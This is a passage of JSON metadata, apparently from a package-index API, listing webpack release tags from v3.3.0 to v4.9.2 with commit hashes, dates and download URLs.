","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"